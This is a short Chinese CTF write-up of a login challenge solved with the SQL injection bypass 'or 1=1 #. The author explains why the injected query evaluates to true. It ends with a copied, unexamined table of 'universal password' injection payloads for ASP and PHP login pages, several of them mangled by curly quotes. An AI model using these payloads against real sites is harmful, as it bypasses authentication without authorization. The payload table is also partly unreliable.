点进链接,显示的是
看出是一道登录题,判断为存在SQL注入。
尝试用账户admin
、密码123456
登陆:
再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。
万能密码表
所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。
账号 'or 1=1 #
密码任意
(这个很好用!)
一般的验证语句为
select * from table_name where username='admin' or 1=1#' and password ='xxx'
账号中的’使前面的引号闭合,or 1=1 使语句恒成立,最后的#号会注释掉#之后的语句,避免报错,所以sql语句返回真值,成功绕过验证,得到flag
(其余暂时没研究过 先搬来了)
asp | aspx万能密码 |
---|---|
"or “a”="a | |
‘.).or.(’.a.’=’.a | |
or 1=1– | |
'or 1=1– | |
a’or’ 1=1– | |
"or 1=1– | |
'or.‘a.’='a | |
“or”="a’='a | |
‘or’’=’ | |
‘or’=‘or’ | |
admin’or 1=1# |
php | PHP万能密码 |
---|---|
'or 1=1/* | |
"or “a”="a | |
"or 1=1– | |
“or”=" | |
“or”="a’='a | |
"or1=1– | |
“or=or” | |
'‘or’=‘or’ | |
') or (‘a’='a | |
‘.).or.(’.a.’=’.a | |
'or 1=1 | |
'or 1=1– | |
'or 1=1/* | |
‘or"="a’='a | |
‘or’ ‘1’=‘1’ | |
‘or’’=’ | |
‘or’’=’‘or’’=’ | |
‘or’=‘1’ | |
‘or’=‘or’ | |
'or.‘a.’='a | |
'or1=1– | |
1’or’1’='1 | |
a’or’ 1=1– | |
a’or’1=1– | |
or ‘a’=‘a’ | |
or 1=1– | |
or1=1– |